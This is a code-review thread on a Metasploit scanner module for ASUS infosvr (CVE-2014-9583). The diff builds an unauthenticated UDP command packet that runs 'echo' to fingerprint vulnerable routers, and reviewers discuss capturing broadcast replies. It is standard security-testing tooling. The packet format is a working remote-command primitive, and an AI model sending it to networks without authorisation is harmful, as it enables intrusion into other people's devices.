modules/auxiliary/scanner/misc/asus_infosvr.rb

```diff
@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Capture
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::UDPScanner
+
+  def initialize
+    super(
+      'Name'           => 'ASUS infosvr Scanner',
+      'Description'    => 'Discover ASUS infosvr servers vulnerable to CVE-2014-9583.',
+      'Author'         => [
+        'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
+        'jduck', # Independent discovery and C exploit
+        'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+      ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Jan 4 2015',
+      'References'     => [
+          ['CVE', '2014-9583'],
+          ['EDB', '35688'],
+          ['URL', 'https://github.com/jduck/asus-cmd']
+      ])
+    register_options [
+      Opt::RPORT(9999),
+      OptAddressRange.new('RHOSTS', [true, 'The broadcast address or CIDR range of targets to query', '255.255.255.255'])
+    ]
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def request
+    pkt = ''
+    # ServiceID   [byte]      ; NET_SERVICE_ID_IBOX_INFO
+    pkt << "\x0C"
+    # PacketType  [byte]      ; NET_PACKET_TYPE_CMD
+    pkt << "\x15"
+    # OpCode      [word]      ; NET_CMD_ID_MANU_CMD
+    pkt << "\x33\x00"
+    # Info        [dword]     ; Comment: "Or Transaction ID"
+    pkt << Rex::Text.rand_text_alphanumeric(4)
+    # MacAddress  [byte[6]]   ; Double-wrongly "checked" with memcpy instead of memcmp
+    pkt << Rex::Text.rand_text_alphanumeric(6)
+    # Password    [byte[32]]  ; Not checked at all
+    pkt << "\x00" * 32
+    # Command Length + \x00 + Command padded to 512 bytes
+    pkt << ([@cmd.length].pack('C') + "\x00" + @cmd).ljust((512 - pkt.length), "\x00")
+  end
+
+  def scan_host(ip)
+    vprint_status "Sending request to #{ip}:#{rport}"
+    scanner_send request, ip, rport
+  end
+
+  def scanner_prescan(batch)
+    @fingerprint = Rex::Text.rand_text_alphanumeric(rand(10) + 10)
+    @cmd = "echo #{@fingerprint}"
+
+    print_status "Sending requests to #{batch.length} hosts..."
+
+    @results = []
+
+    open_pcap 'SNAPLEN' => 128,
```

Comment:
What is the reason for doing the capture here rather than via `scanner_process`?

Reply:
@jhart-r7 The infosvr service does not reply to the source IP address, it replies to the broadcast address `255.255.255.255`

The `scanner_process` method does not parse broadcast traffic - see #9244

Reply:
There does not appear to be a flag for the `UDPScanner` library to enable parsing broadcast traffic. This implementation was the most clean and efficient way I could think of capturing and parsing the broadcast traffic.

To clarify, if `scanner_process` parsed broadcast traffic, the module would be much smaller and easier to read, as there would be no need to use the `Msf::Exploit::Capture` library, use `open_pcap`, use PacketFu, deal with threading, etc.